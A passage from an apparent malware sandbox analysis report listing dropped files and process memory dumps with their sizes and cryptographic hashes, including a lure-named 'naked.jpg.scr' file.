                                                                                                                    d788f92a19da57ea9b6be3853bb2fc9ab1447f13613f95f59b0a463c419bfc3b

                                                                                                                    SHA512

                                                                                                                    c432c5d7231921f74233e1a45e3e60ca58b60f4947a4e31a7b793a6954938a3643e763c4d5309af8b151db33cc06e3bb79774c7ea4e65dabf2b4de1283d20da5

                                                                                                                  • C:\Windows\naked.jpg.scr:Zone.Identifier

                                                                                                                    Filesize

                                                                                                                    241B

                                                                                                                    MD5

                                                                                                                    6882744c1abdd118361b72166b67e53a

                                                                                                                    SHA1

                                                                                                                    3889ea509598433ff8210cb811b2a9cc3a015020

                                                                                                                    SHA256

                                                                                                                    3fe47c7af62ca28c9342b8ede8d0cc812e488816d312c395c724c210a84729ac

                                                                                                                    SHA512

                                                                                                                    2071feb5dd55af44074e3089aeac1dd0cf948ce39845593f61ab34cd0996658bf0ef309b5396028807d5541e5b993ba1a3aaed0f54d9640fc97bf243a976daf7

                                                                                                                  • memory/972-9767-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/972-9794-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/1304-9868-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/1324-570-0x000001FACA770000-0x000001FACA792000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/1324-577-0x000001FACAC90000-0x000001FACACB7000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    156KB

                                                                                                                  • memory/1324-578-0x000001FACACE0000-0x000001FACACF4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    80KB

                                                                                                                  • memory/1640-544-0x00007FF8E4090000-0x00007FF8E40A0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-607-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-539-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-540-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-8697-0x000000001E0A0000-0x000000001E3B0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    3.1MB

                                                                                                                  • memory/1640-8696-0x000000001BF10000-0x000000001BF5C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    304KB

                                                                                                                  • memory/1640-8695-0x0000000000C10000-0x0000000000C18000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/1640-8694-0x000000001BCB0000-0x000000001BD4C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    624KB

                                                                                                                  • memory/1640-8693-0x000000001B690000-0x000000001BB5E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.8MB

                                                                                                                  • memory/1640-541-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-8692-0x000000001B100000-0x000000001B1A6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    664KB

                                                                                                                  • memory/1640-542-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-543-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-545-0x00007FF8E4090000-0x00007FF8E40A0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-608-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-606-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1640-605-0x00007FF8E6C30000-0x00007FF8E6C40000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1776-9178-0x0000000000400000-0x000000000041A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    104KB

                                                                                                                  • memory/1996-9280-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/1996-9231-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/2216-676-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/2216-680-0x0000000005A30000-0x0000000005A4A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    104KB

                                                                                                                  • memory/3012-9773-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/3012-9815-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/3188-9843-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/4728-9805-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/4728-9819-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/4776-8943-0x0000000000400000-0x000000000041A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    104KB